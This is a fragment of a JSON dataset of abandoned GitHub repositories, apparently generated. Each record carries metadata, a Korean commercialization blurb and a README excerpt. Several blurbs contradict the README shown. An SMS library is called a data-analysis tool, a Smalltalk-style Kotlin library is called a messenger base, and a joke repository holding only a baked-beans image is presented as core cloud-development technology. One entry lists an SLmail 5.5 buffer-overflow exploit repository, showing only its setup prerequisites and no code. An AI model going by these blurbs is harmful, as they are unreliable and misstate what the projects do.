Proxies](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Proxy), \"tapping-in\" to native operations such as creating instances (using the normal `new` operator), and updating property values (using the normal assignment operator `=`), and the","composite_score":0.5001,"license_safety_tag":"safe"},{"name":"nehayward/DrinkKit","github_url":"https://github.com/nehayward/DrinkKit","stars":5,"language":"Swift","license":"MIT","abandonment_months":91,"description":"# DrinkKit 상용화 분석\n\n## 왜 보물인가\n칼테일이나 음료 제조법을 쉽게 찾고 공유할 수 있는 도구로, 바 운영자나 음료 애호가들이 즉시 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **음료 레시피 구독 서비스**: 매월 신규 칼테일 레시피와 제조 팁을 제공하는 월간 구독 앱\n2. **바 운영자용 내부 도구**: 재고 관리, 직원 교육, ","readme_excerpt":"<p align=\"center\"/>\n    <img src=\"Logo.gif\" />\n</p>\n<p align=\"center\">\n    <img src=\"https://img.shields.io/badge/Swift-4.2-orange.svg\" />\n    <a href=\"https://github.com/Carthage/Carthage\">\n        <img src=\"https://img.shields.io/badge/carthage-compatible-4BC51D.svg?style=flat\" alt=\"Carthage\" />\n    </a>\n    <img src=\"https://img.shields.io/badge/platforms-iOS|watchOS|macOS-black.svg?&longCache=true&style=flat\" alt=\"Platforms\" />\n    <a href=\"https://twitter.com/nehayward\">\n        <img src=\"https://img.shields.io/badge/contact-@nehayward-51CEDA.svg?style=flat\" alt=\"Twitter: @nehayward\" />\n    </a>\n</p>\n\nWelcome to **DrinkKit**! DrinkKit is a small framework written in Swift which can easily calculate your Blood Alcohol Content or check how long until you're sober. Cheers!\n\n## 👨‍💻 Quick Start\n\nDownload the [latest release](https://github.com/nehayward/DrinkKit/releases/latest) and open up the playground workspace. Then build iOS target.\n\n```swift\nimport Foundation\nimport DrinkKit\n\n//","composite_score":0.5001,"license_safety_tag":"safe"},{"name":"tjdevries/vinterface.nvim","github_url":"https://github.com/tjdevries/vinterface.nvim","stars":7,"language":"Lua","license":"unknown","abandonment_months":56,"description":"# vinterface.nvim 상품화 분석\n\n## 왜 보물인가\n프로그래머들이 매일 쓰는 텍스트 에디터를 더 쉽고 강력하게 만드는 작은 도구로, 개발 생산성을 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **개발자용 SaaS**: 이 도구를 구독형으로 제공하며 클라우드 동기화와 템플릿 라이브러리를 판매\n2. **회사 내부 개발팀 도구**: 대형 IT","readme_excerpt":"# vimterface.nvim\n\nSome ideas about making plugins in neovim.\n\nCloser to \"declarative\" style but without introducing another language (`.json`, `.toml`, etc.)\nand allows for things like passing Lua functions, upvalues, required values, etc.\n\nGoals:\n- Easy to copy & paste in config to get defaults to configure\n- Declars settings, mappings, etc. from plugin and user.\n  - could be used to make GUI, validator, completion engine, etc.\n\n## Thoughts\n\n### Thoughts: Users\n\n`config/*.lua` gets sourced at startup, after loading.\n\nFor example, if you have a file: `config/plugin_one.lua`, this will configure a plugin\nregistered with the name `plugin_one` (plugin registration is talked about later, but end users\ndo not have to worry much about it).\n\n```lua\n-- file: `config/plugin_one.lua`\nreturn {\n  enabled = true,\n\n  -- Change settings of the plugin\n  settings = {\n    debug  = true,\n  },\n\n  -- Set the mappings\n  -- Other possible values could be: maps = { default = true }, or similar (not yet decid","composite_score":0.5001,"license_safety_tag":"unknown"},{"name":"AaltoML/Newt","github_url":"https://github.com/AaltoML/Newt","stars":5,"language":"","license":"unknown","abandonment_months":56,"description":"# Newt 저장소 분석\n\n## 왜 보물인가\n정보가 부족하여 이 프로젝트의 실제 가치를 판단하기 어렵지만, 5년 이상 업데이트되지 않은 점을 고려하면 현재로서는 활발한 개발 프로젝트로 보기 어렵습니다.\n\n## 어디에 쓸 수 있나\n**1. 기계학습 교육 플랫폼 SaaS:** 학생들이 머신러닝 개념을 학습하고 실습할 수 있는 온라인 강좌\n**2. 기업 데이터 ","readme_excerpt":"# Newt / Bayes-Newton\nNewt has now been renamed to Bayes-Newton: [https://github.com/AaltoML/BayesNewton](https://github.com/AaltoML/BayesNewton)\n","composite_score":0.5001,"license_safety_tag":"unknown"},{"name":"methodiusgantenks/daa","github_url":"https://github.com/methodiusgantenks/daa","stars":5,"language":"Jupyter Notebook","license":"unknown","abandonment_months":56,"description":"# methodiusgantenks/daa 저장소 분석\n\n## 왜 보물인가\n저장소 이름과 설명 정보가 불충분하여 기술의 실제 가치를 판단하기 어렵습니다. 별 5개와 2021년 마지막 커밋만으로는 활발한 프로젝트인지 판단할 수 없습니다.\n\n## 어디에 쓸 수 있나\n기술의 구체적 목적이 불명확하여 정확한 활용 시나리오를 제시할 수 없습니다. 저장소의 READM","readme_excerpt":"","composite_score":0.5001,"license_safety_tag":"unknown"},{"name":"sergiodxa/collected-remix","github_url":"https://github.com/sergiodxa/collected-remix","stars":5,"language":"TypeScript","license":"unknown","abandonment_months":40,"description":"# sergiodxa/collected-remix 분석\n\n## 왜 보물인가\n웹사이트를 빠르고 쉽게 만들 수 있는 도구 모음으로, 개발자들이 반복적인 작업을 줄여 더 빠르게 서비스를 출시할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 스타트업이 관리자 대시보드나 고객 포털을 빠르게 구축하는 데 사용\n2. **내부 업무 도구**: 회","readme_excerpt":"# Collected Remix\n\nThis repo is a [Collected Notes](https://collectednotes.com) client app built using Remix.\n\nThe app also uses Remix i18next and Remix Auth packages to support internationalization and authentication. It also has ETag support already built-in. It uses NProgress to show a progress bar on navigation, and uses Tailwind for styles.\n\nThe app consumes the Collected Notes API, and it also shows a few features of Remix:\n\n- Loaders, Meta and Links\n- Form and Actions for login/logout\n- Sessions\n- Cookies\n- Layout Routes\n- Catch and Error Boundaries to show error pages\n- <Link prefetch />\n- Cache Control values for loaders based on the data (articles not updated in a while are cached for a longer time)\n\nThe app is configured to deploy to Vercel, but could be deployed anywhere else.\n","composite_score":0.5001,"license_safety_tag":"unknown"},{"name":"smartlogic/augur","github_url":"https://github.com/smartlogic/augur","stars":5,"language":"Elixir","license":"MIT","abandonment_months":58,"description":"# smartlogic/augur 분석 보고서\n\n## 왜 보물인가\n복잡한 데이터를 쉽게 이해할 수 있도록 자동으로 분석해주는 똑똑한 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소 기업의 판매 데이터를 자동 분석하여 매월 인사이트 리포트를 제공하는 구독 서비스\n2. **내부 업무 도구**: 대기업의 HR팀이 직원 이직 데이터를 분","readme_excerpt":"# Augur\n\n<!-- MDOC !-->\n\nAugur deals with sending SMS.\n\n## Installation\n\nAdd Augur to your deps:\n\n```elixir\ndef deps do\n  [\n    {:augur, \"~> 0.1.0\"}\n  ]\nend\n```\n\nInitialize `Augur` in your supervision tree with the service config\nthat you wish to boot with.\n\nFor example, if you're using [Vapor](https://github.com/keathley/vapor) you\ncan do something similar to:\n\n```elixir\ndef start(_type, _args) do\n  children = [\n    # ...\n    {Augur, augur_config()},\n    # ...\n  ]\n\n  # ...\nend\n\ndef augur_config() do\n  config = MyApp.Config.sms()\n\n  case config.provider do\n    \"development\" ->\n      %Augur.Development{}\n\n    \"twilio\" ->\n      %Augur.Twilio{\n        account_sid: config.twilio_account_sid,\n        auth_token: config.twilio_auth_token\n      }\n  end\nend\n```\n\n## Using Augur\n\nUsing Augur is simple. Load the current configuration from `Augur.Config` and then send a text.\n\nAn example [Oban Worker](https://github.com/sorentwo/oban) is provided below. You should strongly consider\nsending texts o","composite_score":0.5001,"license_safety_tag":"safe"},{"name":"luijait/SLmail5.5-Exploit-BoF","github_url":"https://github.com/luijait/SLmail5.5-Exploit-BoF","stars":5,"language":"Python","license":"unknown","abandonment_months":54,"description":"# SLmail5.5-Exploit-BoF 분석 보고서\n\n## 왜 보물인가\n오래된 메일 서버의 보안 취약점을 찾아내는 도구로, 시스템 보안을 점검하려는 기업들에게 실무적 가치가 있습니다.\n\n## 어디에 쓸 수 있나\n1. **기업 IT 보안 진단 서비스**: 중소기업의 구형 메일 서버 보안 점검을 자동화하는 SaaS로 판매\n2. **내부 보안 감사 도구**:","readme_excerpt":"# SLmail5.5-Exploit-BoF\nBuffer Overflow para SLmail5.5 32 bits con un par de utilidades para que puedas hacer el tuyo\n\n\nREQUISITOS PARA QUE FUNCIONE:\n- Desactivar Firewall de Windows\n- Deshabilitar DEP\n- Asegurarte de que es de 32 bits tanto la aquitectura del SO como del programa\n\n\nHappy Hacking :)\n","composite_score":0.5001,"license_safety_tag":"unknown"},{"name":"sw-yx/tracking","github_url":"https://github.com/sw-yx/tracking","stars":6,"language":"","license":"MIT","abandonment_months":55,"description":"# sw-yx/tracking 프로젝트 분석\n\n## 왜 보물인가\n사용자의 움직임과 행동을 자동으로 기록하는 기술로, 웹사이트나 앱의 사용 패턴을 분석하고 개선할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 구독형 분석 대시보드로 제공하여 소규모 기업들이 고객 행동을 추적하게 함\n- **내부 업무 도구**: 대기업의 직원 업무 효율성","readme_excerpt":"> this list is now archived - look inside https://github.com/sw-yx/brain if you would like an updated list! thank you.\n\n# tracking\n\nI always need to grab developer industry stats. Here's a reference list to find them.\n\n<!-- START doctoc generated TOC please keep comment here to allow auto update -->\n<!-- DON'T EDIT THIS SECTION, INSTEAD RE-RUN doctoc TO UPDATE -->\n**Table of Contents**\n\n- [How many developers are there in the world?](#how-many-developers-are-there-in-the-world)\n- [Web mkt share](#web-mkt-share)\n- [GitHub stars](#github-stars)\n- [npm downloads](#npm-downloads)\n- [php](#php)\n- [dockerhub downloads](#dockerhub-downloads)\n- [Misc categories](#misc-categories)\n  - [Hiring](#hiring)\n  - [Industry Surveys](#industry-surveys)\n  - [Misc Misc](#misc-misc)\n- [Tracking for this repo itself](#tracking-for-this-repo-itself)\n\n<!-- END doctoc generated TOC please keep comment here to allow auto update -->\n\n\n## How many developers are there in the world?\n\n- 10 million https://matt-rick","composite_score":0.5001,"license_safety_tag":"safe"},{"name":"Unix-0x01/AdventOfCode-2019","github_url":"https://github.com/Unix-0x01/AdventOfCode-2019","stars":7,"language":"Java","license":"MIT","abandonment_months":79,"description":"# AdventOfCode-2019 분석 보고서\n\n## 왜 보물인가\n매년 수천 명의 프로그래머들이 참여하는 \"Advent of Code\" 대회의 2019년 솔루션 모음으로, 문제 풀이 방법론과 알고리즘 최적화 기법의 실제 사례를 제공합니다.\n\n## 어디에 쓸 수 있나\n\n1. **온라인 교육 플랫폼 (SaaS)**: 프로그래밍 초심자 대상 \"일일 알고리즘 학","readme_excerpt":"### AdventOfCode\n# AdventOfCode\n``https://adventofcode.com``\n","composite_score":0.5001,"license_safety_tag":"safe"},{"name":"LuminolT/SHU-ICSGenerator","github_url":"https://github.com/LuminolT/SHU-ICSGenerator","stars":5,"language":"Go","license":"unknown","abandonment_months":55,"description":"# SHU-ICSGenerator 평가 분석\n\n## 왜 보물인가\n복잡한 일정 관리 파일을 자동으로 생성해주는 도구로, 학교나 기관에서 수작업으로 하던 반복적인 업무를 시간 단위로 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 학교 행정팀이 월 구독으로 수강신청·시험일정·강의실배치 자동 생성\n2. **내부 업무 도구**: 대학","readme_excerpt":"# SHU-ICSGenerator\n完工啦，快乐\n\n目前稳定（？）版本：[SHU-ICSGenerator v1.0](https://github.com/LuminolT/SHU-ICSGenerator/releases/tag/v1.0)\n\n## 1 使用方法\n\n1.  在教务处官网的课表查询处（[网址](http://xk.autoisp.shu.edu.cn/StudentQuery/QueryCourseTable)）复制表格，粘贴入excel样表（请注意行列对应）；\n2.  运行`run.exe`；\n3.  将`output.ics`发送到手机；\n4.  iOS：从Safari打开导入；\n    Android：从日历打开导入；\n6.  是不是很简单，来，试试看。\n\n## 2 TODO\n\n1.  √适配节假日（主要是冬季学期会被切开）\n2.  适配表格（放宽格式要求）\n\n## 3 Q&A\n\n1.  为什么不直接从教务处爬数据呢？\n\n违反了《数据安全法》《网络安全法》相关规定，网安学子要以网络安全为重。\n\n2.  为什么我的课识别不了？\n\n由于学校排课时间的描述多且杂，目前仅适配了计算机学院的课程内容，但欢迎PR！\n\n    \n","composite_score":0.5001,"license_safety_tag":"unknown"},{"name":"LJmartin94/CodamCoalitionRanks","github_url":"https://github.com/LJmartin94/CodamCoalitionRanks","stars":5,"language":"Python","license":"unknown","abandonment_months":55,"description":"# CodamCoalitionRanks 저장소 분석\n\n## 왜 보물인가\n온라인 프로그래밍 학습 커뮤니티의 사용자 실력을 자동으로 등급화하고 순위를 매기는 시스템으로, 학습자들의 동기부여와 커뮤니티 활성화를 동시에 해결할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 코딩 교육 플랫폼 SaaS**: 학생들의 학습 진도를 시각화하고 경쟁 요소를 추가","readme_excerpt":"","composite_score":0.5001,"license_safety_tag":"unknown"},{"name":"y9vad9/implier","github_url":"https://github.com/y9vad9/implier","stars":5,"language":"Kotlin","license":"unknown","abandonment_months":46,"description":"# y9vad9/implier 분석\n\n## 왜 보물인가\n복잡한 데이터를 간단한 규칙으로 자동 분석할 수 있는 도구로, 수작업으로 하던 데이터 처리 시간을 대폭 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 고객 데이터를 자동으로 분류하고 패턴을 찾아주는 분석 플랫폼\n2. **내부 업무 도구**: 회사 내 보고서, 이메일, 문서","readme_excerpt":"![Maven metadata URL](https://img.shields.io/maven-metadata/v?label=%24version&metadataUrl=https%3A%2F%2Fmaven.y9vad9.com%2Fcom%2Fy9vad9%2Fimplier%2Fimplier%2Fmaven-metadata.xml)\n\n# implier\n\nKotlin Symbol Processor library for creating **[\nMutable](https://github.com/y9vad9/implier/blob/fb5cba3c62defe23ce5773287fc9f37367d800fd/src/main/kotlin/com/y9vad9/implier/annotations.kt#L10)**\n,\n**[Immutable](https://github.com/y9vad9/implier/blob/fb5cba3c62defe23ce5773287fc9f37367d800fd/src/main/kotlin/com/y9vad9/implier/annotations.kt#L18)**\n,\n**[Builders](https://github.com/y9vad9/implier/blob/fb5cba3c62defe23ce5773287fc9f37367d800fd/src/main/kotlin/com/y9vad9/implier/annotations.kt#L35)**\n, **[DSL Builders](https://github.com/y9vad9/implier/blob/1.0.1/src/main/kotlin/com/y9vad9/implier/annotations.kt#L50)**\nfrom interfaces & abstract classes with properties.\n\n## Examples\n\n### Immutable & Mutable\n\n```kotlin\n@ImmutableImpl\n@MutableImpl\ninterface Sample {\n    val sample: String\n}\n```\n\nWill gener","composite_score":0.5001,"license_safety_tag":"unknown"},{"name":"DarioSucic/Advent-of-Code-2021","github_url":"https://github.com/DarioSucic/Advent-of-Code-2021","stars":5,"language":"Python","license":"unknown","abandonment_months":54,"description":"# DarioSucic/Advent-of-Code-2021 분석\n\n## 왜 보물인가\n프로그래밍 초보자들이 단계별로 학습할 수 있는 실제 문제 풀이 솔루션 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **코딩 교육 플랫폼**: 프로그래밍 입문자를 위한 온라인 강좌 또는 부트캠프에서 실습 예제로 활용\n2. **면접 준비 도구**: 기업의 코딩 테스트 준비 앱이","readme_excerpt":"# Advent of Code 2021 ✨\n\nAoC repo with the goal of posting solutions exactly as they were when the stars were acquired. (i.e no cleaning/optimization)\n\n## Runtimes\n|   Day | Part 1       | Part 2       | Extra        |\n|-------|--------------|--------------|--------------|\n|     1 | 1,007 µs     | 1,826 µs     |              |\n|     2 | 516 µs       | 555 µs       |              |\n|     3 | 1,581 µs     | 627 µs       |              |\n|     4 | 5,784 µs     | 19,477 µs    |              |\n|     5 | 41,674 µs    | 134,742 µs   |              |\n|     6 | 329,222 µs   | 652 µs       | 317 µs       |\n|     7 | 37,697 µs    | 91,874 µs    |              |\n|     8 | 462 µs       | 907,161 µs   |              |\n|     9 | 5,995 µs     | 13,006 µs    |              |\n|    10 | 1,382 µs     | 1,595 µs     |              |\n|    11 | 5,297 µs     | 16,197 µs    |              |\n|    12 | 4,040 µs     | 143,995 µs   |              |\n|    13 | 106,421 µs   | 145,799 µs   |              |\n|    14 | 2","composite_score":0.5001,"license_safety_tag":"unknown"},{"name":"KamyabAlex/JavaScript-breakout-game","github_url":"https://github.com/KamyabAlex/JavaScript-breakout-game","stars":5,"language":"JavaScript","license":"MIT","abandonment_months":55,"description":"# JavaScript 브레이크아웃 게임 (Breakout Game) 분석\n\n## 왜 보물인가\n간단한 게임을 직접 만들고 배울 수 있는 완성된 코드 예제로, 프로그래밍 입문자들의 학습 자료로 가치가 있습니다.\n\n## 어디에 쓸 수 있나\n1. **게임 학습 플랫폼 SaaS**: 초급 개발자 대상 온라인 코딩 학습 서비스에 내장 예제로 제공\n2. **교육용 웹","readme_excerpt":"# JavaScript breakout game\n#### JavaScript breakout game with Phaser + ES6 + Webpack.\n\n## Demo\n![JavaScript Breakout](https://linceed.s3.eu-north-1.amazonaws.com/images/demo.gif)\n\n\n## Features\n- ESLINT with JavaScript Standard Style configuration\n- Browsers are automatically updated as you change project files\n- Webpack ready\n- WebFont Loader\n\n# Setup\nTo use this bootstrap you’ll need to install a few things before you have a working copy of the project.\n\n## 1. Clone this repo:\n\nNavigate into your workspace directory.\n\nRun:\n\n```git clone https://github.com/KamyabAlex/JavaScript-breakout-game```\n\n## 2. Install node.js and npm:\n\nhttps://nodejs.org/en/\n\n\n## 3. Install dependencies (optionally you could install [yarn](https://yarnpkg.com/)):\n\nNavigate to the cloned repo’s directory.\n\nRun:\n\n```npm install``` \n\nor if you choose yarn, just run ```yarn```\n\n## 4. Run the development server:\n\nRun:\n\n```npm run dev```\n\nThis will run a server so you can run the game in a browser.\n\nOpen your browser","composite_score":0.5001,"license_safety_tag":"safe"},{"name":"Orbiter/h4xx0r","github_url":"https://github.com/Orbiter/h4xx0r","stars":5,"language":"HTML","license":"Unlicense","abandonment_months":122,"description":"# Orbiter/h4xx0r 저장소 분석\n\n## 왜 보물인가\n마지막 업데이트가 2016년으로 8년 이상 방치된 상태이며, 저장소 설명조차 없어 실제 기능과 활용 가치를 판단하기 어렵습니다.\n\n## 어디에 쓸 수 있나\n- **내부 업무 도구**: 저장소의 실제 기능을 파악해야 해당 분야 적용 가능성을 판단할 수 있습니다.\n- **API 판매**: 현재 상태","readme_excerpt":"# h4xx0r\nh4xx0r.org home page\n\nThis is an experimental web page to practice things which serious open source/free software developers should not do, like\n\n- user tracking (we might do that here just to show how evil it is)\n- allowing XSS to happen\n- cross-domain API retrieval\n- bad cookie usage\n- exposing information about visitors (like browser/os details and IP numbers) to other people, in the public\n\nIn fact, almost all the web pages are using such data, store it, sell it etc.\nThis page is a laboratory to do experiments with such techniques and to exose the results to the public.\n\nTo sum up: evil things may happen if you visit this page. Take care!\n","composite_score":0.5001,"license_safety_tag":"unknown"},{"name":"faraz16iqbal/react-basic-setup","github_url":"https://github.com/faraz16iqbal/react-basic-setup","stars":6,"language":"JavaScript","license":"unknown","abandonment_months":63,"description":"# react-basic-setup 분석\n\n## 왜 보물인가\n웹사이트를 빠르게 만들 수 있는 기본 틀을 제공하는 오픈소스 프로젝트로, 개발자들의 초기 개발 시간을 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 스타트업이 관리 대시보드나 데이터 분석 플랫폼을 빠르게 론칭할 때 기본 틀로 활용\n2. **내부 업무 도구**: 기업","readme_excerpt":"# React Custom Boilerplate\nBasic React Boilerplate with minimal dependencies. \n\n## Quick Start\n\n``` bash\n# Install dependencies\nnpm install\n\n# Serve on localhost:3000\nnpm start\n\n# Build for production\nnpm run build\n```\n","composite_score":0.5001,"license_safety_tag":"unknown"},{"name":"gitpod-io/beans","github_url":"https://github.com/gitpod-io/beans","stars":5,"language":"","license":"MIT","abandonment_months":55,"description":"# gitpod-io/beans 분석\n\n## 왜 보물인가\nGitpod의 공식 저장소로, 클라우드 개발 환경을 구축하는 핵심 기술을 담고 있어 원격 작업 시대의 개발 인프라 수요를 충족할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 웹브라우저에서 바로 코딩할 수 있는 온라인 개발 환경 제공 플랫폼\n2. **내부 업무 도구**: 대규","readme_excerpt":"# beans\n\n<img src=\"https://www.recipetineats.com/wp-content/uploads/2014/05/Homemade-Heinz-Baked-Beans_0.jpg\">\n","composite_score":0.5001,"license_safety_tag":"safe"},{"name":"HallofFamer/KtTalk","github_url":"https://github.com/HallofFamer/KtTalk","stars":6,"language":"Kotlin","license":"unknown","abandonment_months":58,"description":"# KtTalk 저장소 분석\n\n## 왜 보물인가\n카톡 같은 메신저 기능을 직접 만들고 싶은 개발자들이 쉽게 사용할 수 있는 기반 코드를 제공합니다.\n\n## 어디에 쓸 수 있나\n- **내부 업무 도구**: 회사 직원들만 사용하는 사내 채팅 시스템으로 도입하여 외부 메신저 의존도 감소\n- **SaaS 서비스**: 이 코드를 기반으로 '중소기업 전용 협업 앱' ","readme_excerpt":"# KtTalk\nA kotlin library of extension functions that add smalltalk style methods to objects.\n\n## Motivation\nSmalltalk is a pure OO language in which everything is an object, and everything happens by sending messages(aka method calls). For this reason, it does not have built-in control structures, and you will achieve conditional branches and iterations/loops by calling methods. \n\nFor example, if statements in smalltalk are implemented as sending message ifTrue: trueClosure ifFalse: falseClosure to a Boolean object:\n\n```smalltalk\n(17 * 13 > 220) \n   ifTrue: [ Transcript show: ’17 x 13 is greater than 220’ ] \n// The true block will execute, prints \"17 x 13 is greater than 220\" on the transcript. \n```\n\nSimilarly, sending message whileTrue: block to a closure object achieves something similar to a while loop: \n\n```smalltalk\nn := 1. \n[ n < 1000 ] whileTrue: [ n := n*2 ]. \n// n is now 1024.\n```\n\nThis is an elegant OO approach to handle the procedural control structures, combining the stren","composite_score":0.5001,"license_safety_tag":"unknown"},{"name":"Kazuhito00/LearningToCountEverything-Colaboratory-Sample","github_url":"https://github.com/Kazuhito00/LearningToCountEverything-Colaboratory-Sample","stars":6,"language":"Jupyter Notebook","license":"MIT","abandonment_months":54,"description":"# LearningToCountEverything-Colaboratory-Sample 분석\n\n## 왜 보물인가\n사진 속 물체의 개수를 자동으로 세어주는 인공지능 기술로, 재고 관리나 검수 작업을 사람 손으로 하던 것을 자동화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 소매점 재고 관리 SaaS**\n- 편의점이나 카페가 월정액을 내고 사용하는 앱으","readme_excerpt":"# LearningToCountEverything-Colaboratory-Sample\n<img src=\"https://user-images.githubusercontent.com/37477845/144614233-b0dc3d7d-06a8-42d6-994e-708ef4535b86.gif\" width=\"45%\"> <img src=\"https://user-images.githubusercontent.com/37477845/144614924-8111e7a5-f364-4c8e-97b1-01c7cdda2e1e.png\" width=\"45%\"><br>\n[LearningToCountEverything](https://github.com/cvlab-stonybrook/LearningToCountEverything)をColaboratory上で動かすサンプルです。<br>\n\n# How to use\n[![Open In Colab](https://colab.research.google.com/assets/colab-badge.svg)](https://colab.research.google.com/github/Kazuhito00/LearningToCountEverything-Colaboratory-Sample/blob/master/LearningToCountEverything-Colaboratory-Sample.ipynb)<br>\n[Open In Colab]ボタンを押し、Colaboratoryでノートブックを開き、<br>\n最初のセルから順に実行してください。<br><br>\n試す画像を変更する際はimread_from_url()のURLを変更してください。<br>\n```\n# 画像読み込み\nimport cv2\nfrom imread_from_url import imread_from_url\n\nimage_list = []\ncv_image = imread_from_url('https://raw.githubusercontent.com/Kazuhito00/LearningToCountEverything-Colaborato","composite_score":0.5001,"license_safety_tag":"safe"},{"name":"kamik1979/ImageConverter","github_url":"https://github.com/kamik1979/ImageConverter","stars":6,"language":"C#","license":"MIT","abandonment_months":55,"description":"# ImageConverter 상용화 분석\n\n## 왜 보물인가\n사진이나 그림 파일을 다른 형식으로 바꿔주는 기술로, 일반인도 자주 필요로 하는 기본적이면서도 실용적인 기능입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 웹사이트에서 \"사진을 JPG에서 PNG로 변환해주는 온라인 도구\" 형태로 제공\n2. **내부 업무 도구**: 마케팅팀이 ","readme_excerpt":"# ImageConverter\nConvert any file to image and back!\n\nA C# programs for converting images to binaries and binaries to images. It has no purpose, just for fun. You can use it to visualize data inside the file. \nExecutables gives nice results.\n\n# Running the program\nThis repository contains only source for the programs. Tu run it, you need to compile it first.\n\n# How to use\nUsage of these programs is pretty easy and straightforward. Both take the following data:\n - Row width - Width of the image. Must be the same when encoding and decoding for correct data.\n - Source file - File to decode/encode.\n - Result file - Where to save results.\n\nIf you do something wrong, the programs will give you an error.\n\nHave fun!\n","composite_score":0.5001,"license_safety_tag":"safe"},{"name":"terrysahaidak/TurboModuleExample","github_url":"https://github.com/terrysahaidak/TurboModuleExample","stars":6,"language":"Objective-C++","license":"unknown","abandonment_months":58,"description":"# TurboModuleExample 분석\n\n## 왜 보물인가\n모바일 앱에서 성능이 중요한 기능을 빠르게 처리할 수 있는 기술을 보여주는 실제 예제이므로, 앱 개발자들의 성능 문제 해결에 바로 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 모바일 뱅킹, 증권 거래앱 등 빠른 반응이 중요한 금융 앱의 성능 개선 기술 판매\n2","readme_excerpt":"# React Native Turbo Module example\n\nThis repository is a Turbo Module implementation of Clipboard Core React Native module.\n\n## How to make your own Turbo Module\n\n1. Create a new npm package\n2. Add `react-native-tscodegen` and `react-native-tscodegen-types` as devDependencies\n3. Copy `TurboClipboard.podspec`, rename it, change library name, author etc\n4. Implement `TurboModule.ts` file: define all the methods in the Spec interface\n5. Copy `react-native-tscodegen.json`, rename library name etc\n6. Add `codegen` script to `package.json` with the following command to run: `react-native-tscodegen ./react-native-tscodegen.json`\n7. Run `npm run codegen` - it will generate Spec files - the JSI bridge which you should include in your sources. Your native module interface should extend `NSObject <ModuleNameSpec>` - the generated spec by the codegen of your `TurboModule.ts`\n8. Add your implementation source files following the example of `TurboClipboard` header and `mm` file\n9. Change `source_fi","composite_score":0.5001,"license_safety_tag":"unknown"},{"name":"iamtakagi/tCore","github_url":"https://github.com/iamtakagi/tCore","stars":5,"language":"Java","license":"MIT","abandonment_months":49,"description":"# tCore 저장소 분석\n\n## 왜 보물인가\n게임 서버나 실시간 애플리케이션에서 필요한 핵심 기능들을 미리 준비해둔 기초 도구로, 개발 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **게임 개발 SaaS**: 인디 게임 개발자들이 구독하는 게임 서버 구축 플랫폼으로 제공\n2. **내부 업무 도구**: 게임사 개발팀의 표준 라이브러리로","readme_excerpt":"# tCore\n[![Build](https://github.com/iamtakagi/tCore/actions/workflows/build.yml/badge.svg)](https://github.com/iamtakagi/tCore/actions/workflows/build.yml)\n\nThe core plugin for Spigot. (Supports 1.8.8 ≦)\n\n## Build\n`$ mvn clean package`\n\n## LICENSE\nMIT License.\n","composite_score":0.5001,"license_safety_tag":"safe"},{"name":"baldurbjarnason/colophon.cards","github_url":"https://github.com/baldurbjarnason/colophon.cards","stars":5,"language":"CSS","license":"unknown","abandonment_months":33,"description":"# colophon.cards 저장소 분석\n\n## 왜 보물인가\n책이나 글의 뒷면에 적힌 출판 정보를 디지털로 아름답게 만들고 관리할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n- **출판사 SaaS**: 독립 출판사가 책의 메타데이터(저자, 출판사, ISBN 등)를 자동으로 정리하고 공유하는 웹 서비스\n- **전자책 플랫폼 기능**: 아마존 킨들, 애","readme_excerpt":"---\ntitle: The Making of Colophon Cards\nlayout: layout.njk\neleventyExcludeFromCollections: true\npermalink: /\ntags: front\n---\n\n# The Making of Colophon Cards\n\n## Notes on the making of Colophon Cards\n\n1. [The original front page](notes/00-making/)\n2. [Design Notes](notes/01-design-notes/)\n3. [The Data Model](notes/02-data-model/)\n4. [The Sharing Model](notes/03-sharing-model/)\n5. [Attachments and Bookmarks](notes/04-attachments-bookmarks/)\n6. [Reading and Viewing](notes/05-reading-viewing/)\n7. [The Business Model](notes/06-business-model/)\n8. [Questions that will need to be answered](notes/10-questions/)\n9. [HTML Sketches: Whither Cards?](/notes/whither-cards/)\n10. [Working Spaces: Using Cards to Make Cards](/notes/working-spaces/)\n11. [The Curious Case of the Colophon Cards Survey Results](/notes/survey-results/)\n12. [What I learned about markdown from interviewing a bunch of people (baldurbjarnason.com)](https://www.baldurbjarnason.com/2022/why-people-use-markdown/)\n13. [The different","composite_score":0.5001,"license_safety_tag":"unknown"},{"name":"CassandraSehic/Encypted-Chat","github_url":"https://github.com/CassandraSehic/Encypted-Chat","stars":6,"language":"Java","license":"unknown","abandonment_months":41,"description":"# CassandraSehic/Encypted-Chat 분석\n\n## 왜 보물인가\n개인정보 보호가 중요해지는 시대에 메시지 내용을 암호화하여 보안을 강화하는 채팅 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 보안 메신저 앱으로 개인 사용자와 소규모 팀을 위한 월 구독 서비스 제공\n2. **내부 업무 도구**: 기업 직원들의 민감한 ","readme_excerpt":"# Encrypted-Chat\nThe purpose of this project was to give Java users, who can run Java in an IDE, a way to chat while being certain that their messages are secure. Unlike with other providers, like Whatsapp, for example, you do not have to blindly trust that your messages will not be decrypted for their own purposes, or that they don't have some sort of backdoor access. We cannot know this because when we use those chat applications, we dont actually know what encryption code is run. The cool thing about this chat application is that the encryption is done using open source packages. This way no backdoor access can be added because the community, or you, would notice. Users can also customize their encryption method. So, if you want to be absolutely sure that not even your internet provider is able to see your messages, please check this out, and buy me a coffee at https://www.buymeacoffee.com/CassandraSehic. Thank 